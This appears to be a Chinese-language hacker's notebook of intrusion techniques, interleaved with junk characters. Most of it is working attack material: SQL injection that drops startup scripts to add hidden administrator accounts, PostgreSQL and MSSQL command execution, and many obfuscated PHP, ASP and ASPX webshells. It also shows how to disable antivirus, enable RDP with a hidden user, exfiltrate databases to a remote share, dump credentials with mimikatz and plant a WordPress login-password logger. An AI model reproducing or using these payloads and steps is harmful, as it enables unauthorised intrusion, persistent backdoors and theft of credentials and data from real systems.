create table a (cmd text);% F- r& S, R; ~/ R
insert into a values ("set wshshell=createobject (""wscript.shell"") " );, `. p7 o, J8 C- F% Y1 ]" I) l+ j
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );& Y' G5 a' c! Y+ A: }
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
: l' w! W0 N h$ i; d# Xselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
" p* R3 V& n. b) B; T" ?5 ydrop table a;/ U8 @ v; [% X _* I; f: ^
7 M7 C1 n2 p7 u; G1 y& P
英文版本:3 o7 O# M: V. Y- |# L$ M" @$ s9 I% F, S
$ G/ h/ {! I8 c
use test;& U5 ?! }! {% g R( w1 q1 V
create table a (cmd text);
, a, k/ w6 w% `6 Oinsert into a values ("set wshshell=createobject (""wscript.shell"") " );3 V+ T8 s; v' b* U3 d$ J
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
; w! m, X9 f2 N( hinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
3 m8 w% X/ A- ?! Rselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";- S7 z+ n, |9 A( Z0 x5 y7 Y/ X
drop table a;- u% x$ |2 }. R, M
- Y/ }- n: u: u5 x) k/ o9 Dcreate table a (cmd BLOB);3 P6 g6 L1 R5 e& |2 B
insert into a values (CONVERT(木马的16进制代码,CHAR));& R$ P# i2 E# b" ?' x6 T
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'5 \1 E1 o/ y4 c: W* `& A( p
drop table a;
1 S7 m8 j1 l" O) r3 S! b' W- X# f+ L- j* g. q
记录一下怎么处理变态诺顿* K; o- E$ P; s& t
查看诺顿服务的路径
5 o5 ?% |" E% P5 tsc qc ccSetMgr
* o3 |7 {6 o c$ \% z# s然后设置权限拒绝访问。做绝一点。。+ c% b' e) H6 C$ G. j
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system- A% l4 P2 `% D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER", g) |' T+ u( V, J
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators2 k( s3 V1 k# z1 c' S
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone% F0 u" p- k( q1 M/ \8 |
0 |, a. m4 l1 t& t) u* o然后再重启服务器* o2 \0 z' H6 T2 S" X
iisreset /reboot
7 e" q! q2 E: T8 g这样就搞定了。。不过完事后。记得恢复权限。。。。& e. Q9 H# {" s8 H. u/ s' n3 ~6 `. ?
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F6 @8 M: s% z0 j. ~
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F% o% a* Y+ m& a" N0 _8 v7 V
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F7 j% B8 c. e& b4 e. B
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
# a7 R& ^# A6 W8 B. M$ J. @SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin9 P3 H3 A- `5 D5 X6 ]& O
8 o* @0 p+ A* xEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user'''): m4 a3 C9 i9 Q# w
. S* u f: a# I7 i/ v- c# d4 v# xpostgresql注射的一些东西6 R5 L/ c- e8 J
如何获得webshell
/ X+ w# V) s3 o A6 d/ n# `http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
& [6 a3 Y+ P5 U! C, N- p2 ^( k4 G5 nhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
1 x$ q/ [% c2 G0 g* k2 C" r- p2 p4 ohttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
* y- ~6 O( e4 l- Q2 s/ r* ]如何读文件# g$ O) B9 R+ a( }& R
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT); h& j6 \) w8 F
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
* _- l! [6 }7 u7 V" M; W1 \http://127.0.0.1/postgresql.php?id=1;select * from myfile;3 b \4 e! y- q5 Y. Y4 Y, v
; q+ v* I* X* m% E. D' Q( h1 [z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
7 ~: v* V1 P# M" j, W7 ?当然,这些的postgresql的数据库版本必须大于8.X
" j/ k- S% \& U6 a9 v创建一个system的函数:
1 B/ D# n- K0 G' H0 gCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT) i! S( ?( ]9 s& {6 n# \6 s
3 p( O- U( X1 M9 c) {- @: [2 y6 ^4 e
创建一个输出表:$ }% _* Z) @7 n/ {. w1 f% \
CREATE TABLE stdout(id serial, system_out text)8 O! V4 o# B/ f- D- r
' b# c; @% g) r6 X/ \执行shell,输出到输出表内:
; ]- C+ s, F: _SELECT system('uname -a > /tmp/test')
* S2 C2 x( N$ `9 [8 j
# M0 ?) T! r$ ~! H/ G$ Lcopy 输出的内容到表里面;
' C4 g1 h1 K' M8 K7 fCOPY stdout(system_out) FROM '/tmp/test'
9 x2 `! [* Q$ m$ j. k1 d* D
1 F, W9 R, e5 F; t, f( B0 W9 ?从输出表内读取执行后的回显,判断是否执行成功
7 x) n) D" H) p* g& P: U; g1 c6 y5 ]$ l4 U. p' M
SELECT system_out FROM stdout4 N# R9 Z* R1 K2 D: Z
下面是测试例子 `$ c# e; S* a
5 g: p& q/ t0 [7 Y( {1 _8 f/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 8 N0 u+ D- F: c% V: q
- M1 c4 w- I' L- ? M/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' i2 [5 K8 i, t* @
STRICT --
# E0 D& u- L/ H% q9 A3 k4 K t d
/store.php?id=1; SELECT system('uname -a > /tmp/test') --+ W8 y& S7 E* i8 x
5 d. w$ d) b' Q$ A# N5 G8 D
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
9 k2 G3 }7 v! {' y
+ Q1 v& q$ Q/ f9 V/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--2 G5 [! R" s4 P7 w- b: C
net stop sharedaccess stop the default firewall
1 V. I ]8 {4 bnetsh firewall show show/config default firewall8 ]+ o, N6 }- u/ `7 |
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
' v5 l6 F1 e9 }* lnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
6 c6 ~# }( p$ h$ R! r+ a修改3389端口方法(修改后不易被扫出)
# V/ I% _6 O3 N6 p修改服务器端的端口设置,注册表有2个地方需要修改
' i* S+ e5 _) K0 F% G+ o/ u. T f& k: R& X
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]/ T& `+ W6 P J `' g3 o
PortNumber值,默认是3389,修改成所希望的端口,比如6000
9 {9 S& K: b. f+ V% c/ y6 h0 ~
4 `: m$ J8 \# [; T' N" c, o& A第二个地方:, z) _% \+ M- D
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] % r5 n5 w6 w$ M& ]- f' N
PortNumber值,默认是3389,修改成所希望的端口,比如60005 [; P7 @# {1 M7 ]+ A1 ?$ ], U
. }- S& l4 o8 q8 ^7 j2 F现在这样就可以了。重启系统就可以了
5 d! v9 k: e1 V) ]+ A0 u. o1 E" d" l# L4 N+ P, S$ U3 @7 {& G
查看3389远程登录的脚本5 D% I8 Y9 h/ a/ o1 p
保存为一个bat文件
7 R0 x6 A6 s. G. l* J9 o0 Ldate /t >>D:\sec\TSlog\ts.log
' x$ H" @( `$ c0 Q2 }time /t >>D:\sec\TSlog\ts.log
* k& q+ p6 D% D+ Inetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log6 o: O& @; H0 v9 v& {
start Explorer
& m/ K9 v _3 o) {$ B4 g: U: }- ~# `
mstsc的参数:
7 i9 V; W# o9 L: `9 f+ ?+ F7 p8 w+ @
# v& ~, w0 q- t- J. J5 {2 g远程桌面连接
- Z2 v: c" z* Z r2 @* | ^% p- a1 F6 ~# Q) X, H+ ~
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
1 I( _& ?3 L: z! G, k: ~ [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?8 K( ~8 e$ i* M: {+ C) V
6 ?+ @( w/ C1 a" Q4 L- x9 m. E. c7 u<Connection File> -- 指定连接的 .rdp 文件的名称。4 F' u4 d U! c% b$ y: d0 L
+ i7 l- [" T) e8 r x* ?: L5 L
/v:<server[:port]> -- 指定要连接到的终端服务器。) l% B- X W: G3 q& I
8 n1 S1 _0 ?1 @8 N4 ~
/console -- 连接到服务器的控制台会话。
/ m4 r( J0 P4 w9 p. u; b/ U
7 c& l4 `( g' l, B" p: _/f -- 以全屏模式启动客户端。# f2 y; O, }6 \8 L' Q* W6 q0 c
; W( J# Q) \7 K2 @/w:<width> -- 指定远程桌面屏幕的宽度。
: [ l& k1 H; z! x! j. ?; J; K. v/ P$ @: |5 z; }
/h:<height> -- 指定远程桌面屏幕的高度。
0 b. O" `4 b1 R& _! Y+ I7 Q
( }6 c% v+ R. R/ L/edit -- 打开指定的 .rdp 文件来编辑。
2 I, C' k. O% X3 m: [" t
9 p% M0 D# j: @* u/migrate -- 将客户端连接管理器创建的旧版& U$ m3 m6 G; |
连接文件迁移到新的 .rdp 连接文件。+ }, S1 p5 Q8 k* A4 q' e+ O- O
+ t. s3 }; U& U" j [& I* x
6 {1 b( [" t" I) Y' W1 _其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
4 l; w: n/ D9 Umstsc /console /v:124.42.126.xxx 突破终端访问限制数量
9 J% [. C- ?8 ]: H4 ` _8 p" W8 b' J/ K/ P
命令行下开启33896 N2 @' V9 F+ z& N) h) {" N( ~
net user asp.net aspnet /add
, ~; p2 o2 `3 P A! @! c; x! Unet localgroup Administrators asp.net /add
# j# Z0 O. d' p, G+ unet localgroup "Remote Desktop Users" asp.net /add
# I& l. i$ p+ ]& s! W: t, Z, C5 I8 K+ O0 qattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D9 D w( n2 J$ n* [. Z' U6 P6 x7 Z# J
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0. R6 U) A& j( k! d5 U0 B
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1$ n( V) u" M. w- R
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f0 z. S( Q- X& q0 u1 c- l, u7 K
sc config rasman start= auto
+ C/ Y1 Q$ [; e6 W4 rsc config remoteaccess start= auto
+ b k. X" ~8 G: X% `net start rasman* ~8 k$ Y4 w% J3 @
net start remoteaccess
5 m. F) z! ~! u0 i* A# V; ~' RMedia
6 J& F- e" |- J$ E! o/ S<form id="frmUpload" enctype="multipart/form-data"/ [/ L; [6 K4 r" k. g
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
4 {( E7 A$ k9 @<input type="file" name="NewFile" size="50"><br>
; P0 a. A6 G4 G; M<input id="btnUpload" type="submit" value="Upload">9 C$ s' T* N) T1 j* j; \5 N
</form>) X$ ~2 M% E; L3 i1 o
4 d8 r4 L+ c5 e: Tcontrol userpasswords2 查看用户的密码 O: G P8 i# z8 ^* W9 q* A) e
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
7 q/ t `. T1 n/ y2 m" t" OSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a, ?3 i+ u8 V p' E" o2 F9 K8 }
& ]1 Z& ?% b" Z8 f: q141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:+ _8 |# W- r/ G
测试1:
5 Q( q5 b& X) i/ R0 iSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
0 N8 f' G$ r3 O) M, s4 A
: [. i, ]9 X6 b7 _* ?" P6 A测试2:7 o5 N, i w/ U+ }% J6 p2 M
+ } ]6 c, d1 ]create table dirs(paths varchar(100),paths1 varchar(100), id int)
. V* b* |+ Y! J7 x
8 ]; I+ l* Y: ~% f/ l6 ~delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
& s3 S3 `4 Z: n2 v% d
$ s7 `: J5 M% I+ q- {) gSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t11 v. \+ E* d5 Y; T
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
6 S& C6 R' D+ r6 K6 B( t8 B可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
8 t( V( f2 o" S0 U2 Vnet stop mcafeeframework% r; l. n2 d/ r$ X
net stop mcshield K& V4 C2 H2 N
net stop mcafeeengineservice
$ I0 Z) o8 ?7 d5 J- c( ~net stop mctaskmanager! k6 |, T4 z3 `% V# _" n" ]% U
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D( r w7 O; J; \6 ?, s
2 y S; m* ]2 n" \; U. z5 f
VNCDump.zip (4.76 KB, 下载次数: 1)
5 u" Y7 ^! N# `8 c4 w) ^0 W% l密码在线破解http://tools88.com/safe/vnc.php
; V: b4 R9 T+ |1 F- \# v: nVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取; v& H1 b' }) p& P/ _% |
, X7 G: ^' G r9 V0 e) Iexec master..xp_cmdshell 'net user'' J8 U6 l5 G$ A: u; t: r2 o
mssql执行命令。' s+ K# R% q" a/ |
获取mssql的密码hash查询. V; i/ H/ W( K, ` Q: f
select name,password from master.dbo.sysxlogins
6 o+ s8 X) j0 a/ K4 m5 A5 F
" C# r2 j4 A9 _backup log dbName with NO_LOG;
( P) q9 l7 K, z9 Z1 Q9 z0 P/ nbackup log dbName with TRUNCATE_ONLY;" ]: L1 Q& v. x9 \3 q
DBCC SHRINKDATABASE(dbName);% g. C* I' v- r
mssql数据库压缩
7 @* {8 m4 K4 {4 R5 T+ u# Y3 h V1 t6 C9 Z/ q* p4 A2 Q
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
+ w# o1 m- i) }/ X将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。4 T- p1 [0 w7 @& b% A9 t6 Z
+ |; _/ F K. M2 M Y3 m6 T+ H( Bbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'6 _8 V; D8 m( S
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
% @/ l# L, B) l6 S4 J! a7 I7 @7 _' B0 ?5 Q- n1 ]2 D. G
Discuz!nt35渗透要点:
) o( m9 Z- O& B" W, b7 }(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
* i5 b7 Q4 g Y+ T, M(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
) e2 l2 t) \+ O4 L3 [ ?( j' V(3)保存。3 P. P4 [# [' ?( @) g! j
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
# V. X7 z7 o/ ]" qd:\rar.exe a -r d:\1.rar d:\website\7 V, J4 |' P$ z6 I
递归压缩website
7 g0 I/ l* q2 a9 v3 w2 V/ b注意rar.exe的路径' X: ]- f# W+ o1 c' R+ L
$ h1 \6 `% G$ g
<?php
2 {& x: s @* d$ ]
2 a- f) ?% [* x' J$telok = "0${@eval($_POST[xxoo])}";! I+ R5 F) Y$ F6 n/ L
, ]+ D( z& m' N8 q, U9 y6 O/ o4 ]" N
$username = "123456";
; L8 J' l4 q+ ^
- \; e4 S7 v& B! x$userpwd = "123456";% E |, N2 s7 w3 `% c, |
- A' r/ _ {. L- p$ {$telhao = "123456";
) ]$ W' R) y. h3 O* `0 W- A- | Y o6 b/ ?1 e9 i! } T" b
$telinfo = "123456";
$ B4 C% U. h6 q) z5 G. a- T
: x; M: r' v, C2 `% d1 n/ y?>
% `7 \7 |2 c3 f/ U9 D" L- A& nphp一句话未过滤插入一句话木马" d3 i l( t% p
% F: i$ @* f! l* s |+ Q/ D2 {+ W6 D8 M
站库分离脱裤技巧. e3 N! b( x/ r
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'8 R6 y& k; D" j; j+ _
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass', {9 _. K$ ]) ^$ _( u; ~# h
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
& d1 P7 D/ o0 u& d3 h这儿利用的是马儿的专家模式(自己写代码)。) H$ i! w5 d' U* s. h4 t# d
ini_set('display_errors', 1);" u, n* C- ?( q* q# }4 h1 `
set_time_limit(0);
1 H: z9 M4 h4 W, [error_reporting(E_ALL);
* v6 ] j: L6 d# V5 K) W( E8 x$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());0 m- ~9 I. k0 G& X3 M/ _7 [
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
8 w) x p* I' R0 \, `* O$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());! y7 X) p& I0 Y, f6 ^9 t
$i = 0;
/ F6 n, W" S! V8 \5 M/ [$ Q$tmp = '';* K& P0 G3 A! v% J5 r0 f$ p+ C
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
, b4 w. |8 z, y! c9 P $i = $i+1;3 A- I/ {$ o/ M; j
$tmp .= implode("::", $row)."\n";
" W( M5 {- L7 r if(!($i%500)){//500条写入一个文件
; Q5 _. D8 t2 ?) M+ G8 G" R" _3 P $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';1 Z) `0 |) R, T n5 K4 I
file_put_contents($filename,$tmp);- h$ J# K/ f. `& _ C
$tmp = '';! e% c7 p9 |% \, J" O
}
6 }) [+ K; P! x% O% X- O( H& ?* A}* u9 Q' u i0 s: s1 @. _
mysql_free_result($result);" H2 |3 j% _. m& y
% Q' m" r6 [* S8 F
- e) @' L7 t* l! \( D
' t' n* I' J1 |4 a
//down完后delete
( m6 v ?$ n8 C6 _
3 f/ A2 v& A" R' p1 @0 @7 [) d! f" i' p4 I) f7 P
ini_set('display_errors', 1);
6 q# Z7 O7 X; j0 t( Q0 z+ D$ o! Eerror_reporting(E_ALL);
. s6 O( h6 v3 Z4 a& ?! r: \$i = 0;
2 i- S: t5 | Rwhile($i<32) {4 P- [) u) s+ l' `
$i = $i+1;$ B( W. l8 ~& C5 n
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';6 N7 p D* k& q3 q7 l7 ?! u
unlink($filename);
; \0 v2 q/ F& g}
3 P- |" z, [5 n4 r5 X. E6 Q+ ahttprint 收集操作系统指纹& `3 m$ h. Y: Q7 R3 R$ X0 \0 W
扫描192.168.1.100的所有端口
0 ]3 q% t ~9 `6 cnmap –PN –sT –sV –p0-65535 192.168.1.100& t' |; y8 u1 C3 G2 S
host -t ns www.owasp.org 识别的名称服务器,获取dns信息# a! v- \* `5 B* k+ C- k8 M+ J. o6 @
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输, d3 ~2 K, Z8 @4 _0 n' Y
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host& g& `9 @/ a0 y+ Z
% N0 l) t( F" Z9 l/ L( g
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)" d8 |9 v* [2 Y, r1 F9 m
, A% V E* Y e- Y8 V8 \
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)& X& `6 t- w7 m
- p1 l+ I3 m" G
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
$ L5 ^ d3 f! L' @1 n4 W+ Z
6 b; g. V) W9 Z, e' p DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
2 h% x- q+ ?& g! ?
6 `6 c" ^8 E1 l x3 A& ? http://net-square.com/msnpawn/index.shtml (要求安装)
8 B& ?& w" L! Y: ^9 E# J" P& O
1 b( z$ L4 ?; \9 H7 h tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
* U* r' P- O' r* |* @9 r7 R, d- y
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
v! r0 X, S, ^. O$ Kset names gb2312$ N( v$ u3 D6 d' {6 e! E
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
: ]; _6 _4 f: x3 q! T7 z+ u* s8 f }2 ]8 L" ^; o6 Y# |
mysql 密码修改
+ w/ V5 G6 U, l3 H3 n# H4 i7 RUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 8 ~: A# Y" j* S: { }/ I. \3 h8 F
update user set password=PASSWORD('antian365.com') where user='root';
4 z6 g: O) K! c$ M6 F# Mflush privileges;3 Y# D, b2 r- q- k/ g
高级的PHP一句话木马后门" j: u% u* e4 ?' `/ U
2 v' E2 L0 Y! [8 C! t
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀8 y% m; p$ D* n
5 ~8 g7 A k T' a$ `5 X3 v9 r
1、
8 F5 f: ?. a( @7 K
! E( n3 l- l" w! L$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";7 f5 X y; _) U& @/ S9 a
# b2 E7 V* K) o5 s5 f5 z# n: Y# u6 O
$hh("/[discuz]/e",$_POST['h'],"Access");
5 C# |7 k! D( Q5 W/ W2 q9 Q6 j& H* K1 q- @" z3 @# ]& s4 Y
//菜刀一句话
8 ]$ M: K# Y0 W4 m: q( k! t& l0 r
- A0 q7 K! y$ b; E; |2、
$ M- B" j4 Y9 @' Y0 X) m1 e3 V1 S& X1 A+ ]' {5 t3 J: m
$filename=$_GET['xbid'];
# u5 h1 L+ `7 a* H0 i. ^
- F9 Y/ L/ H, }1 |: o4 n1 Cinclude ($filename);/ d1 y+ s: j$ E, q3 X9 b0 W
; G* Z" t0 w- i" C0 n5 c0 E8 h8 J//危险的include函数,直接编译任何文件为php格式运行9 _( Z- }0 Z2 }9 W2 y
8 u. ^3 p( C. j; c* G) c3、1 ]- i5 X' ], R
6 K7 F- t" }8 N1 @$reg="c"."o"."p"."y";
+ N5 U/ _- R! w3 |! k3 j- b+ X7 P/ u, m) M" K
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
& u5 T( Y: T7 N5 b. m' \7 }
: L% w7 k1 N* S5 o% V F) c; h. o//重命名任何文件
$ k. a# |8 }7 h% r
: e, _, @7 e% g1 Z" U8 V, ~( K4、$ j( h. b" F ~6 W5 ^' }2 e. m5 l
; p X ?7 l; ]0 i6 B
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";' n! @2 I% q9 V1 Z B
6 \2 N1 i; }% [$gzid("/[discuz]/e",$_POST['h'],"Access");
; l. p: z) e6 x( _
# T. R: I) ^0 z5 e* U& c//菜刀一句话
; O) a+ g1 `% V$ j
/ L S4 }3 b5 D/ p, ]5、include ($uid);9 B, b* M+ I2 u0 z# ~$ D
! Z) E! K0 p. q0 W1 Z//危险的include函数,直接编译任何文件为php格式运行,POST
* a. r% V3 c' Y/ ^1 o* P4 {. {
% C% n! w5 I* [' A1 g2 M. k8 w
6 g* J ^ E- F4 c9 S* T//gif插一句话2 r9 I# W) p- N( b6 h
! j) }" }& p- }7 N: F$ {8 S6、典型一句话
$ J5 n, g4 A3 A4 {$ \7 I& B$ E0 y' S2 [6 K6 ?& c6 m5 q; `0 X
程序后门代码
6 A1 s! x6 Q* _$ \! _$ O+ C) w; o; s<?php eval_r($_POST[sb])?>
5 ?! b4 h. Z+ f7 @- X程序代码6 C" B1 C- Q5 o3 @1 r
<?php @eval_r($_POST[sb])?>1 I4 M9 a8 g3 M* d* m. u8 D
//容错代码
) |" k2 ~& w( z1 T3 D4 h程序代码
8 b5 r7 q m& V# s<?php assert($_POST[sb]);?>
4 C" R3 j' K) E//使用lanker一句话客户端的专家模式执行相关的php语句
$ e$ I( W9 x E程序代码6 a* v! ] a+ d. ?
<?$_POST['sa']($_POST['sb']);?>! r5 S5 p8 O1 A
程序代码' c7 y. i9 N. [+ P8 R
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>9 O( O" a" P) S8 W
程序代码
) ~) _/ j4 O4 u3 W8 J<?php
5 @0 m4 ?% d/ w" q/ f+ f: Q@preg_replace("/[email]/e",$_POST['h'],"error");7 e B( S6 U, q; t
?>
# \: |, \0 N3 h0 l: K0 w! v8 _% t//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
( q1 H M# g/ z2 i1 Q) M程序代码
3 }2 P2 o2 i6 {2 M# p5 u; a<O>h=@eval_r($_POST[c]);</O>
1 j. U( w' g8 g& r; G程序代码0 F% m f' w: [4 f4 t0 J
<script language="php">@eval_r($_POST[sb])</script>
3 k y* F2 l3 [+ |$ ?4 P3 [8 d }//绕过<?限制的一句话
: j' U6 L+ x% Y! a6 M- P, e
* C+ U' N. W U$ `http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
" g3 Y g7 w/ m' c详细用法:
8 ~9 ~+ y+ ?; W, i- j1、到tools目录。psexec \\127.0.0.1 cmd
" t8 v l, T+ E. ~2、执行mimikatz% s4 x c7 z9 N* W% }- L
3、执行 privilege::debug
. j1 j f; ~$ `4、执行 inject::process lsass.exe sekurlsa.dll2 \* m1 h8 E+ K1 W9 t- f& L$ P
5、执行@getLogonPasswords
L h2 `- m# h/ ]7 @6、widget就是密码
1 ^! G0 h1 v3 S9 X$ |6 E7、exit退出,不要直接关闭否则系统会崩溃。+ J& h5 S; s$ R0 b( b( _4 o
! v2 V$ R2 J9 a& o) j1 ]
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面* U- J) F6 j% H5 s* G
: h( N x# S; C$ o2 f
自动查找系统高危补丁
5 [4 }" V+ N* U8 e) j3 ^systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
$ K7 q6 c+ ^3 Y* n( `0 _7 Q6 S0 K- g6 x3 G, K2 u; H1 D
突破安全狗的一句话aspx后门
! B8 Z/ O' X( J* I<%@ Page Language="C#" ValidateRequest="false" %>
' H R- \4 ?5 S' m! @<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
% H9 k9 }& ~1 J! M/ j+ _3 @webshell下记录WordPress登陆密码8 P' d( a$ c8 \1 k# F7 X* l$ p+ W
webshell下记录Wordpress登陆密码方便进一步社工, [( l3 ?6 }1 J- }9 c3 b Y& d
在文件wp-login.php中539行处添加:5 K2 t, k/ o% A; B5 q- B, ]
// log password
& L' Y$ I# W" `" }0 H$log_user=$_POST['log'];
) N- Z2 a! {/ L3 y$ k7 p2 G6 u$log_pwd=$_POST['pwd'];' D; l* Q# O( B% v$ x) v* l
$log_ip=$_SERVER["REMOTE_ADDR"];5 } c* V* {# N2 t& x" u1 S
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;4 y& u1 g' k5 [$ \
$txt=$txt.”\r\n”;/ o' f" y$ k2 r: L4 k3 Q
if($log_user&&$log_pwd&&$log_ip){; R6 r1 K1 U% c# w$ z
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
8 X l5 d t9 p/ P Y- N: n}
% B# c, \. u' P4 i H& G8 ^) h1 c' ^当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
% O2 h( E! Z. Z就是搜索case ‘login’4 @8 H* r% W1 O9 w
在它下面直接插入即可,记录的密码生成在pwd.txt中,
, `1 g* X2 w& z- w2 D其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
